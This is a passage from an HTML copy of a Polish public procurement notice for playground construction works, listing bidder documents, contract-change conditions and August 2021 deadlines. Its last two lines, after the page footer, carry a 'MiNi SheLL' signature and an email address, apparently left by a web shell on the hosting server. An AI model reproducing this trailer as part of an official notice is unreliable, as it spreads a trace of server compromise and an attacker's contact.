udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 3.4 do<br/>formularza ofertowego;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>3) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o których mowa w ppkt 2 powyżej, składa dokument lub dokumenty wystawione w<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że<br/>nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa powyżej, powinien<br/>być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.<br/>4) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w ppkt 2 powyżej, zastępuje się je w całości lub części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo<br/>organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy.<br/>5) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp<br/>dane umożliwiające dostęp do tych środków.<br/>6) Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę na formularzu ofertowym – wg wzoru stanowiącego Załącznik nr 3 do SWZ wraz z nw.<br/>dokumentami należy złożyć za pośrednictwem Platformy:<br/>a) oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu<br/>w zakresie wskazanym w SWZ – wg wzoru stanowiącego Załącznik nr 3.1 do formularza<br/>ofertowego,<br/>b) kosztorys ofertowy sporządzony w oparciu o załączniki stanowiące Opis Przedmiotu<br/>Zamówienia (Załącznik nr 1 do SWZ) - zgodny w zakresie przedmiotu robót oraz obmiarów<br/>podanych w przedmiarze robót. Tabela kosztorysu ofertowego winna odpowiadać tabeli<br/>przedmiaru robót, tj. powinna zawierać wszystkie pozycje przedmiarowe (bez możliwości ich<br/>pomijania). Dla każdej pozycji kosztorysu należy podać m.in. nazwę/opis pozycji, jednostkę<br/>miary, ilość jednostek miary, cenę jednostkową, wartość pozycji. Jeżeli w wyniku dokonanej<br/>przez Wykonawcę analizy dokumentacji projektowej uzna ilość robót określoną w przedmiarze<br/>robót za niewłaściwą, to zmiany ilości robót Wykonawca może dochodzić w ramach procedury<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>pytań, zgodnie z art. 284 ustawy Pzp,<br/>c) wykaz danych technicznych zaoferowanych elementów (urządzeń zabawowych) placu zabaw,<br/>sporządzony zgodnie z wzorem stanowiącym Załącznik nr 3.2 do formularza ofertowego,<br/>d) karty katalogowe lub folder lub dokumentacja techniczna producenta lub inny dokument<br/>zawierające informacje na temat oferowanych elementów (urządzeń zabawowych) wraz z<br/>fotografiami zaoferowanych elementów (urządzeń zabawowych) zgodnie z przedmiarem robót, z<br/>podaniem nazwy producenta, parametrów wymaganych w opisie przedmiotu zamówienia,<br/>wymiarów, pozwalające jednoznacznie stwierdzić, że są one zgodne z opisem przedmiotu<br/>zamówienia,<br/>e) certyfikat zgodności sprzętu z normą PN-EN 1176 wystawiony przez akredytowaną jednostkę<br/>PCA,<br/>f) oświadczenie, o którym mowa w rozdziale XIV pkt<br/>3 SWZ– wg wzoru stanowiącego Załącznik nr 3.3 do formularza ofertowego, – dotyczy tylko<br/>Wykonawców wspólnie ubiegających się o zamówienie oraz Wykonawców prowadzących<br/>działalność w formie spółki cywilnej,<br/>g) zobowiązanie podmiotu trzeciego (jeżeli dotyczy) do oddania Wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia, jeśli Wykonawca powołuje się na<br/>zasoby podmiotu trzeciego w celu wykazania spełniania warunków udziału w postępowaniu (wg<br/>wzoru stanowiącego Załącznik nr 3.5 do formularza ofertowego). Ponadto Wykonawca, który<br/>powołuje się na zasoby podmiotu trzeciego, w celu wykazania braku istnienia wobec tego<br/>podmiotu podstaw wykluczenia oraz spełnienia – w zakresie, w jakim powołuje się na ich zasoby<br/>– warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w<br/>oświadczeniu, o którym mowa w pkt 2 a) powyżej,<br/>h) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy - jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w Rozdziale XI pkt 5 ppkt 2) SWZ.<br/>Warunek ten dotyczy również odpowiednio osoby działającej w imieniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego oraz podwykonawców. Pełnomocnictwo<br/>to musi w swej treści jednoznacznie wskazywać uprawnienie do reprezentacji. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie, o którym mowa w Rozdziale XI pkt 3 SWZ, składa każdy z Wykonawców.<br/>Oświadczenie te potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zgodnie z art. 117 ust. 4 Pzp<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają<br/>poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się zmiany umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy w następującym zakresie:<br/>1) personelu Wykonawcy w przypadku wystąpienia sytuacji uniemożliwiającej wykonywanie<br/>umowy przez Wykonawcę za pomocą osoby/osób wskazanej/wskazanych w jego ofercie pod<br/>warunkiem, że nowa/nowe osoba/osoby zaproponowana/zaproponowane będzie/będą<br/>spełniała/spełniały warunki udziału przewidziane dla tych osób i opisane w SWZ;<br/>2) w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego:<br/>a) powierzenie podwykonawcom innej części zamówienia niż wskazana w ofercie Wykonawcy;<br/>b) zmiana lub rezygnacja z podwykonawcy na etapie realizacji robót;<br/>c) powierzenie części zamówienia podwykonawcom w trakcie realizacji zamówienia, pomimo<br/>niewskazania w postępowaniu żadnej części zamówienia przeznaczonej do wykonania w<br/>ramach podwykonawstwa, o ile nie sprzeciwia się to postanowieniom SWZ;<br/>3) terminu wykonania umowy o czas opóźnienia Wykonawcy, jeżeli takie opóźnienie ma lub<br/>będzie miało wpływ na wykonanie przedmiotu umowy i będzie następstwem poniżej<br/>wskazanych okoliczności, niezależnych od Wykonawcy:<br/>a) w przypadku zaistnienia nadzwyczajnych niekorzystnych warunków atmosferycznych, pod<br/>warunkiem, że konieczność wykonywania robót w okresie wystąpienia nadzwyczajnych<br/>niekorzystnych warunków atmosferycznych nie jest następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność z powodu braku zabezpieczenia terenu przed<br/>niekorzystnymi warunkami atmosferycznymi, na którym prowadzi się roboty budowlane -<br/>dopuszcza się wydłużenie terminu o liczbę dni, w których z powodu zaistnienia nadzwyczajnych<br/>niekorzystnych warunków atmosferycznych brak było możliwości wykonywania umowy w<br/>sposób, który pozwoliłby na wykonanie przedmiotu umowy w terminie, o którym mowa w § 5 ust.<br/>1 umowy pomimo starań Wykonawcy i zastosowania środków zapobiegawczych (w tym również<br/>brak było możliwości, z uwagi na technologię wykonywania robót, normy lub inne przepisy,<br/>zmiany kolejności wykonywania robót w sposób, który pozwoliłyby na terminowe wykonanie<br/>przedmiotu umowy). Przez nadzwyczajne niekorzystne warunki atmosferyczne rozumie się:<br/>wszelkie warunki atmosferyczne, w tym w szczególności wszelkie opady atmosferyczne lub<br/>temperatury powietrza, odbiegające od przeciętnych danych meteorologicznych Instytutu<br/>Meteorologii i Gospodarki Wodnej z poprzednich dwóch lat od daty złożenia oferty przez<br/>Wykonawcę, dla obszaru obejmującego miejsce wykonywania robót, a dotyczących takich<br/>warunków atmosferycznych, na jakie powołuje się Wykonawca, dla takiego samego miesiąca<br/>kalendarzowego, jak ten, w którym wystąpiły warunki atmosferyczne, na jakie powołuje się<br/>Wykonawca, które to nadzwyczajne warunki atmosferyczne z uwagi na technologię<br/>wykonywania robót, normy lub inne przepisy - uniemożliwiły wykonywanie robót;<br/>b) zawieszenia/wstrzymania wykonywania robót budowlanych przez organy nadzoru<br/>budowlanego z przyczyn niezależnych od Wykonawcy;<br/>c) wystąpienia Siły wyższej, w tym pandemii, klęski żywiołowej;<br/>d) wprowadzenia ograniczeń sanitarno-epidemiologicznych w dostępie do placu budowy lub<br/>objęcie kwarantanną co najmniej 40% osób skierowanych do wykonywania prac przez<br/>Wykonawcę, w takim przypadku termin wykonania umowy może zostać wydłużony o liczbę dni<br/>odpowiadającą liczbie dni ograniczenia dostępu do placu budowy lub liczbę dni w której stan<br/>załogi objętej kwarantanną a skierowanej do realizacji przedmiotu umowy wynosił co najmniej 40%<br/>e) opóźnienia, utrudnienia lub przeszkody spowodowanej przez, lub dającej się przypisać<br/>Zamawiającemu;<br/>f) konieczności przeprowadzenia wykopalisk uniemożliwiających wykonanie robót budowlanych,<br/>lub wykopalisk archeologicznych;<br/>g) konieczności usunięcia niewypałów i niewybuchów;<br/>h) stwierdzenia odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych;<br/>Szczegółowe informacje dotyczące zmian umowy zawiera projekt umowy załączony do SWZ. Z<br/>uwagi na liczbę znaków wpisano tylko częściowe dane. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem: https://przetargi.murowana-goslina.pl (Platforma zakupowa) w myśl Ustawy PZP na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-13 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-11</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com